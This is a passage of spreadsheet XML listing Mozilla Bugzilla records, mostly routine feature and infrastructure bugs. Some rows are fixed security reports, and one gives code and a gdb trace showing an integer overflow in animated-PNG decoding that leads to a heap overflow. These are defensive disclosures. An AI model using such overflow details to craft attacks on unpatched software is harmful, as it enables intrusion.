        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4866" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4866" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K4866" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4866" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4866" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4866" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4866" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4866" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q4866" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4866" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4866" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T4866" t="n">
        <v>1</v>
      </c>
      <c r="U4866" t="n">
        <v>0</v>
      </c>
      <c r="V4866" t="n">
        <v>22</v>
      </c>
      <c r="W4866" t="inlineStr">
        <is>
          <t>Created attachment 8664417
call_stack.txt
Not sure which component this should go under so I copied bug 366559 for now.
I am fuzzing the latest version of the code from:
https://github.com/google/brotli</t>
        </is>
      </c>
      <c r="X4866" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4867">
      <c r="A4867" t="n">
        <v>926917</v>
      </c>
      <c r="B4867" t="inlineStr">
        <is>
          <t>2013-10-15 07:08:00 -0700</t>
        </is>
      </c>
      <c r="C4867" t="inlineStr">
        <is>
          <t>Please add {for} support for fx26, m26 and add Firefox 26 to the dropdown UI</t>
        </is>
      </c>
      <c r="D4867" t="inlineStr">
        <is>
          <t>2013-10-17 06:09:55 -0700</t>
        </is>
      </c>
      <c r="E4867" t="n">
        <v>1</v>
      </c>
      <c r="F4867" t="n">
        <v>1</v>
      </c>
      <c r="G4867" t="n">
        <v>5</v>
      </c>
      <c r="H4867" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4867" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4867" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K4867" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4867" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4867" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4867" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4867" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4867" t="inlineStr">
        <is>
          <t>u=contributor c=wiki p=1 s=2013.21</t>
        </is>
      </c>
      <c r="Q4867" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4867" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4867" t="inlineStr">
        <is>
          <t>2013Q4</t>
        </is>
      </c>
      <c r="T4867" t="n">
        <v>1</v>
      </c>
      <c r="U4867" t="n">
        <v>0</v>
      </c>
      <c r="V4867" t="n">
        <v>6</v>
      </c>
      <c r="W4867" t="inlineStr">
        <is>
          <t>We need support for Firefox 22 both in the markup and the UI so that we can draft articles. We should also remove</t>
        </is>
      </c>
      <c r="X4867" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4868">
      <c r="A4868" t="n">
        <v>1570184</v>
      </c>
      <c r="B4868" t="inlineStr">
        <is>
          <t>2019-07-30 16:33:12 -0700</t>
        </is>
      </c>
      <c r="C4868" t="inlineStr">
        <is>
          <t>[Experiment] Pref-Flip: Heuristics Study for Permissions Notifications Fx 68.0 Release</t>
        </is>
      </c>
      <c r="D4868" t="inlineStr">
        <is>
          <t>2019-09-17 09:37:10 -0700</t>
        </is>
      </c>
      <c r="E4868" t="n">
        <v>1</v>
      </c>
      <c r="F4868" t="n">
        <v>1</v>
      </c>
      <c r="G4868" t="n">
        <v>5</v>
      </c>
      <c r="H4868" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4868" t="inlineStr">
        <is>
          <t>Shield</t>
        </is>
      </c>
      <c r="J4868" t="inlineStr">
        <is>
          <t>Shield Study</t>
        </is>
      </c>
      <c r="K4868" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4868" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4868" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4868" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4868" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4868" t="inlineStr"/>
      <c r="Q4868" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4868" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4868" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4868" t="n">
        <v>1</v>
      </c>
      <c r="U4868" t="n">
        <v>0</v>
      </c>
      <c r="V4868" t="n">
        <v>2</v>
      </c>
      <c r="W4868" t="inlineStr">
        <is>
          <t>Heuristics Study for Permissions Notifications
We want to collect heuristics to inform our implementation to reduce websites spamming users with requests to send notifications.
Experimenter is the source of truth for details and delivery. Changes to Bugzilla are not reflected in Experimenter and will not change delivery configuration.
More information: https://experimenter.services.mozilla.com/experiments/heuristics-study-1-new-user-profile/</t>
        </is>
      </c>
      <c r="X4868" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4869">
      <c r="A4869" t="n">
        <v>332173</v>
      </c>
      <c r="B4869" t="inlineStr">
        <is>
          <t>2006-03-29 18:05:58 -0800</t>
        </is>
      </c>
      <c r="C4869" t="inlineStr">
        <is>
          <t>Problems with regexp parsing of '~' in nsIZipReader.findEntries (and other nsWildCard uses)</t>
        </is>
      </c>
      <c r="D4869" t="inlineStr">
        <is>
          <t>2009-09-30 11:40:56 -0700</t>
        </is>
      </c>
      <c r="E4869" t="n">
        <v>1</v>
      </c>
      <c r="F4869" t="n">
        <v>1</v>
      </c>
      <c r="G4869" t="n">
        <v>3</v>
      </c>
      <c r="H4869" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4869" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4869" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4869" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4869" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4869" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4869" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4869" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4869" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q4869" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4869" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4869" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4869" t="n">
        <v>1</v>
      </c>
      <c r="U4869" t="n">
        <v>0</v>
      </c>
      <c r="V4869" t="n">
        <v>86</v>
      </c>
      <c r="W4869" t="inlineStr">
        <is>
          <t>The way the character '~' is parsed (by iterating from the end of the pattern to the front to find it) is incorrect, because it assumes that '~' always signifies a negation pattern (pat~pat2) if it's not escaped.  However, characters other than ']' in character classes (e.g., '[abc]') are *not* escaped.  Further problems also appear in invalid patterns which combine '(pat|pat2)' and 'pat~pat2' syntaxes, and in some cases it is possible to produce a crash.
To demonstrate these bugs, here's a table of results of testing various patterns against various strings.  These patterns and strings should be considered as "raw" strings, so if they were actually being used in code '\' would need to be escaped.
Pattern      String       Match?   Is Behavior Correct?
-------------------------------------------------------
a[a\~b]      aa           yes      yes
a[a\~b]      a\           yes      yes
a[a\~b]      a~           yes      yes
a[a~b]       a~           NO       NO
a[a~b]b      a~b          NO       NO
(a|b)(a|~)b  a~b          CRASH    "NO"
Note that the last behavior isn't strictly incorrect because there's no specified behavior, but ideally it should be impossible for any pattern/string combination to cause a crash regardless of pattern validity.</t>
        </is>
      </c>
      <c r="X4869" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4870">
      <c r="A4870" t="n">
        <v>395460</v>
      </c>
      <c r="B4870" t="inlineStr">
        <is>
          <t>2007-09-07 16:58:44 -0700</t>
        </is>
      </c>
      <c r="C4870" t="inlineStr">
        <is>
          <t>Make multi-select fields searchable</t>
        </is>
      </c>
      <c r="D4870" t="inlineStr">
        <is>
          <t>2008-02-12 03:44:51 -0800</t>
        </is>
      </c>
      <c r="E4870" t="n">
        <v>1</v>
      </c>
      <c r="F4870" t="n">
        <v>1</v>
      </c>
      <c r="G4870" t="n">
        <v>4</v>
      </c>
      <c r="H4870" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4870" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4870" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4870" t="inlineStr">
        <is>
          <t>3.1.1</t>
        </is>
      </c>
      <c r="L4870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4870" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4870" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4870" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4870" t="inlineStr"/>
      <c r="Q4870" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4870" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4870" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T4870" t="n">
        <v>1</v>
      </c>
      <c r="U4870" t="n">
        <v>0</v>
      </c>
      <c r="V4870" t="n">
        <v>21</v>
      </c>
      <c r="W4870" t="inlineStr">
        <is>
          <t>Right now multi-select fields can't really be searched in query.cgi, because they don't show up in the bugs table.
This must be done before 3.2.</t>
        </is>
      </c>
      <c r="X4870" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4871">
      <c r="A4871" t="n">
        <v>921248</v>
      </c>
      <c r="B4871" t="inlineStr">
        <is>
          <t>2013-09-26 15:50:05 -0700</t>
        </is>
      </c>
      <c r="C4871" t="inlineStr">
        <is>
          <t>Backfill missing in backfill_signature_summary for signature_summary_devices</t>
        </is>
      </c>
      <c r="D4871" t="inlineStr">
        <is>
          <t>2013-10-16 11:23:20 -0700</t>
        </is>
      </c>
      <c r="E4871" t="n">
        <v>1</v>
      </c>
      <c r="F4871" t="n">
        <v>1</v>
      </c>
      <c r="G4871" t="n">
        <v>4</v>
      </c>
      <c r="H4871" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4871" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4871" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K4871" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4871" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4871" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4871" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4871" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4871" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q4871" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4871" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4871" t="inlineStr">
        <is>
          <t>63</t>
        </is>
      </c>
      <c r="T4871" t="n">
        <v>1</v>
      </c>
      <c r="U4871" t="n">
        <v>0</v>
      </c>
      <c r="V4871" t="n">
        <v>2</v>
      </c>
      <c r="W4871" t="inlineStr">
        <is>
          <t>Fix adds that to that stored procedure.</t>
        </is>
      </c>
      <c r="X4871" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4872">
      <c r="A4872" t="n">
        <v>443693</v>
      </c>
      <c r="B4872" t="inlineStr">
        <is>
          <t>2008-07-04 22:50:53 -0700</t>
        </is>
      </c>
      <c r="C4872" t="inlineStr">
        <is>
          <t>Integer overflow in info_callback() processing animated PNG</t>
        </is>
      </c>
      <c r="D4872" t="inlineStr">
        <is>
          <t>2009-02-17 13:49:02 -0800</t>
        </is>
      </c>
      <c r="E4872" t="n">
        <v>1</v>
      </c>
      <c r="F4872" t="n">
        <v>1</v>
      </c>
      <c r="G4872" t="n">
        <v>3</v>
      </c>
      <c r="H4872" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4872" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4872" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K4872" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4872" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4872" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4872" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4872" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4872" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4872" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4872" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4872" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4872" t="n">
        <v>1</v>
      </c>
      <c r="U4872" t="n">
        <v>0</v>
      </c>
      <c r="V4872" t="n">
        <v>24</v>
      </c>
      <c r="W4872" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Build Identifier: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008061004 Firefox/3.0
Integer overflows in info_callback() processing animated PNG
There are 2 integer overflows leading to heap buffer overflows in info_callback() in nsPNGDecoder.cpp.  I believe it's only exploitable when parsing APNGs, so I think this only affects FF3.  I have not looked at the code for FF 2.  I'm guessing this might affect Thunderbird, but I haven't checked.  Please credit Drew Yao of Apple Product Security.
in info_callback():
  if (png_get_first_frame_is_hidden(png_ptr, info_ptr)) {
    decoder-&gt;mFrameIsHidden = PR_TRUE;
  } else {
    decoder-&gt;CreateFrame(0, 0, width, height, decoder-&gt;format);
  }
  if (decoder-&gt;mTransform &amp;&amp;
      (channels &lt;= 2 || interlace_type == PNG_INTERLACE_ADAM7)) {
    PRUint32 bpp[] = { 0, 3, 4, 3, 4 };
    decoder-&gt;mCMSLine =
      (PRUint8 *)nsMemory::Alloc(bpp[channels] * width);
    if (!decoder-&gt;mCMSLine)
      longjmp(decoder-&gt;mPNG-&gt;jmpbuf, 5); // NS_ERROR_OUT_OF_MEMORY
  }
  if (interlace_type == PNG_INTERLACE_ADAM7) {
    decoder-&gt;interlacebuf = (PRUint8 *)nsMemory::Alloc(channels * width * height);
Both of the Allocs can overflow to an unexpectedly small number, leading to a buffer overflow later.  The reason I think this can only be triggered by a APNG is that if png_get_first_frame_is_hidden() is false, decoder-&gt;CreateFrame will get called.  That leads to gfxASurface::CheckSurfaceSize getting called, which checks if height * width would overflow.  To avoid this check the attacker needs to use an APNG with the first fcTL chunk missing, which causes png_get_first_frame_is_hidden() to be true.
When you run the attached test case png file, Firefox will crash.  Sometimes it might be a null deref.  I can demonstrate that the integer overflow occurs, leading to a heap buffer overflow, using libgmalloc(3) on Mac OS X.  libgmalloc places a guard page immediately after each heap allocation, causing a crash when you write past the end of it.
(gdb) set env DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib
(gdb) b nsPNGDecoder.cpp:648 if png_ptr-&gt;apng_flags == 1
(gdb) run
Breakpoint 1, info_callback (png_ptr=0x56ddde00, info_ptr=0x56de7f60) at /Volumes/data_apps/mozilla/modules/libpr0n/decoders/png/nsPNGDecoder.cpp:648
648	  if (decoder-&gt;mTransform &amp;&amp;
(gdb) n
Current language:  auto; currently c++
657	  if (interlace_type == PNG_INTERLACE_ADAM7) {
(gdb) n
658	    decoder-&gt;interlacebuf = (PRUint8 *)nsMemory::Alloc(channels * width * height);
(gdb) p channels
$1 = 4
(gdb) p/x width
$2 = 0x8000
(gdb) p/x height
$3 = 0x8000
(gdb) p/x channels*width*height
$4 = 0x0
#overflow causes a 0-size buffer to be allocated
(gdb) n
(gdb) p decoder-&gt;interlacebuf
$11 = (PRUint8 *) 0x5700bff0 ""
(gdb) c
Continuing.
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x5700c000
0x13480cd4 in MOZ_PNG_combine_row (png_ptr=0x56ddde00, row=0x5700bff0 "", mask=255) at /Volumes/data_apps/mozilla/modules/libimg/png/pngrutil.c:2472
2472	      png_memcpy(row, png_ptr-&gt;row_buf + 1,
(gdb) p row
$12 = (png_bytep) 0x5700bff0 ""
#The destination pointer for this memcpy, is the 0-size buffer which was allocated earlier.
(gdb) bt
#0  0x13463cd4 in MOZ_PNG_combine_row (png_ptr=0x5305de00, row=0x5328dff0 "", mask=255) at /Volumes/data_apps/mozilla/modules/libimg/png/pngrutil.c:2472
#1  0x13460f5d in MOZ_PNG_progressive_combine_row (png_ptr=0x5305de00, old_row=0x5328dff0 "", new_row=0x5306ffd1 "") at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:1746
#2  0x134361fc in row_callback (png_ptr=0x5305de00, new_row=0x5306ffd1 "", row_num=0, pass=0) at /Volumes/data_apps/mozilla/modules/libpr0n/decoders/png/nsPNGDecoder.cpp:715
#3  0x13460f16 in MOZ_PNG_push_have_row (png_ptr=0x5305de00, row=0x5306ffd1 "") at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:1732
#4  0x1346066a in MOZ_PNG_push_proc_row (png_ptr=0x5305de00) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:1029
#5  0x13460429 in MOZ_PNG_proc_IDAT_data (png_ptr=0x5305de00, buffer=0xf173e595 "x??y?\034?}??y??UgW??@\003??M\020 \001R?(??(?ƒ|??̄|??^Gػ????????\0373??#bg&amp;&lt;\023\033?3?Þ?ږ?;?aY?i?\"EJ?O", buffer_length=2655) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:980
#6  0x13460239 in MOZ_PNG_push_read_IDAT (png_ptr=0x5305de00) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:911
#7  0x1345e9e6 in MOZ_PNG_proc_some_data (png_ptr=0x5305de00, info_ptr=0x53067f60) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:61
#8  0x1345e95d in MOZ_PNG_process_data (png_ptr=0x5305de00, info_ptr=0x53067f60, buffer=0xf173dff4 ",???.???C\f???????\031?\017h?쩉?X?\"?\032????u&gt;????W?j?\v\023Zhͳ? L&amp;?d?Q^\023??\005\nr?g\032?\032?6?\024?z\024?\017C? \004}38\022(?˔\020?e?.AF??\0340\006??\b?=Sc", buffer_size=4096) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:36
#9  0x1343569b in ReadDataOut (in=0x46ea9f6c, closure=0x5305bfc0, fromRawSegment=0xf173dff4 ",???.???C\f???????\031?\017h?쩉?X?\"?\032????u&gt;????W?j?\v\023Zhͳ? L&amp;?d?Q^\023??\005\nr?g\032?\032?6?\024?z\024?\017C? \004}38\022(?˔\020?e?.AF??\0340\006??\b?=Sc", toOffset=20480, count=4096, writeCount=0xbfffd2c4) at /Volumes/data_apps/mozilla/modules/libpr0n/decoders/png/nsPNGDecoder.cpp:335
#10 0x00370c5b in nsPipeInputStream::ReadSegments (this=0x46ea9f6c, writer=0x134355ee &lt;ReadDataOut&gt;, closure=0x5305bfc0, count=45056, readCount=0xbfffd564) at /Volumes/data_apps/mozilla/xpcom/io/nsPipe3.cpp:799
Reproducible: Always</t>
        </is>
      </c>
      <c r="X4872" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4873">
      <c r="A4873" t="n">
        <v>412807</v>
      </c>
      <c r="B4873" t="inlineStr">
        <is>
          <t>2008-01-17 10:16:18 -0800</t>
        </is>
      </c>
      <c r="C4873" t="inlineStr">
        <is>
          <t>integrate buildbot config file tester w/ buildbot</t>
        </is>
      </c>
      <c r="D4873" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4873" t="n">
        <v>1</v>
      </c>
      <c r="F4873" t="n">
        <v>1</v>
      </c>
      <c r="G4873" t="n">
        <v>5</v>
      </c>
      <c r="H4873" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4873" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4873" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4873" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4873" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4873" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4873" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4873" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4873" t="inlineStr"/>
      <c r="Q4873" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4873" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4873" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4873" t="n">
        <v>1</v>
      </c>
      <c r="U4873" t="n">
        <v>0</v>
      </c>
      <c r="V4873" t="n">
        <v>7</v>
      </c>
      <c r="W4873" t="inlineStr">
        <is>
          <t>Created attachment 297570
integrate config file tester
This patch integrates a config file tester into Buildbot. It makes it accessible through 'buildbot checkconfig'. I've already posted this on buildbot.net in ticket#37: http://buildbot.net/trac/ticket/37</t>
        </is>
      </c>
      <c r="X4873" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4874">
      <c r="A4874" t="n">
        <v>1813376</v>
      </c>
      <c r="B4874" t="inlineStr">
        <is>
          <t>2023-01-29 02:56:46 -0800</t>
        </is>
      </c>
      <c r="C4874" t="inlineStr">
        <is>
          <t>Same-Origin Policy Bypass Image Size Leak in Drag and Drop</t>
        </is>
      </c>
      <c r="D4874" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:49 -0700</t>
        </is>
      </c>
      <c r="E4874" t="n">
        <v>1</v>
      </c>
      <c r="F4874" t="n">
        <v>1</v>
      </c>
      <c r="G4874" t="n">
        <v>3</v>
      </c>
      <c r="H4874" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4874" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4874" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K4874" t="inlineStr">
        <is>
          <t>Firefox 109</t>
        </is>
      </c>
      <c r="L4874" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4874" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4874" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4874" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4874" t="inlineStr">
        <is>
          <t>[disclosure deadline 2023-04-29][adv-main110+]</t>
        </is>
      </c>
      <c r="Q4874" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4874" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4874" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T4874" t="n">
        <v>1</v>
      </c>
      <c r="U4874" t="n">
        <v>0</v>
      </c>
      <c r="V4874" t="n">
        <v>24</v>
      </c>
      <c r="W4874" t="inlineStr">
        <is>
          <t>Created attachment 9314748
poc.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Steps to reproduce:
## Title
  - Same-Origin Policy Bypass Image Size Leak in Drag and Drop
## Summary
  - A Same-Origin Policy Bypass vulnerability exists in the Drag and Drop
  - If this vulnerability is exploited, it is possible to bypass the Same-Origin Policy and leak the size of the Image.
## Test environment
  - Product : Mozilla Firefox 109
  - OS		: Windows 10 (21H2), macOS Ventura 13.2
## Proof-of-Concept
  - Please check the attached file!
## Reproduce
  - Open the server and access the poc page.
  - When you drag and drop an image, the size of the image is leaked.
## CREDIT Information
  - Dohyun Lee (@l33d0hyun) of SSD Labs</t>
        </is>
      </c>
      <c r="X4874" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4875">
      <c r="A4875" t="n">
        <v>1179262</v>
      </c>
      <c r="B4875" t="inlineStr">
        <is>
          <t>2015-07-01 08:36:36 -0700</t>
        </is>
      </c>
      <c r="C4875" t="inlineStr">
        <is>
          <t>Remove PlayPreview registration from PDF Viewer</t>
        </is>
      </c>
      <c r="D4875" t="inlineStr">
        <is>
          <t>2016-02-29 11:48:53 -0800</t>
        </is>
      </c>
      <c r="E4875" t="n">
        <v>1</v>
      </c>
      <c r="F4875" t="n">
        <v>1</v>
      </c>
      <c r="G4875" t="n">
        <v>2</v>
      </c>
      <c r="H4875" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4875" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4875" t="inlineStr">
        <is>
          <t>PDF Viewer</t>
        </is>
      </c>
      <c r="K4875" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4875" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4875" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4875" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4875" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4875" t="inlineStr"/>
      <c r="Q4875" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4875" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4875" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T4875" t="n">
        <v>1</v>
      </c>
      <c r="U4875" t="n">
        <v>0</v>
      </c>
      <c r="V4875" t="n">
        <v>36</v>
      </c>
      <c r="W4875" t="inlineStr">
        <is>
          <t>(As a temporary solution?) that will make transition to OOP jsplugins easier. PlayPreview will be removed as a part of the jsplugins and moving PDF viewer to out-of-process architecture might take some time. Also it will be useful to have capturing of the original content stream implemented (bug 964435) -- the PlayPreview lacks of this functionality as well.
We want to change logic of EMBED tags to disable any instantiation of the native PDF plugins if the internal PDF viewer is enabled. That will allow its stream converter take a priority. This also allows to use the original data stream, and not re-create a new one.</t>
        </is>
      </c>
      <c r="X4875" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4876">
      <c r="A4876" t="n">
        <v>1144107</v>
      </c>
      <c r="B4876" t="inlineStr">
        <is>
          <t>2015-03-17 06:31:55 -0700</t>
        </is>
      </c>
      <c r="C4876" t="inlineStr">
        <is>
          <t>crash in [@ stagefright::SampleTable::isValid() ] with h264 mp4</t>
        </is>
      </c>
      <c r="D4876" t="inlineStr">
        <is>
          <t>2024-05-30 08:59:16 -0700</t>
        </is>
      </c>
      <c r="E4876" t="n">
        <v>1</v>
      </c>
      <c r="F4876" t="n">
        <v>1</v>
      </c>
      <c r="G4876" t="n">
        <v>3</v>
      </c>
      <c r="H4876" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4876" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4876" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4876" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L4876" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4876" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4876" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4876" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4876" t="inlineStr">
        <is>
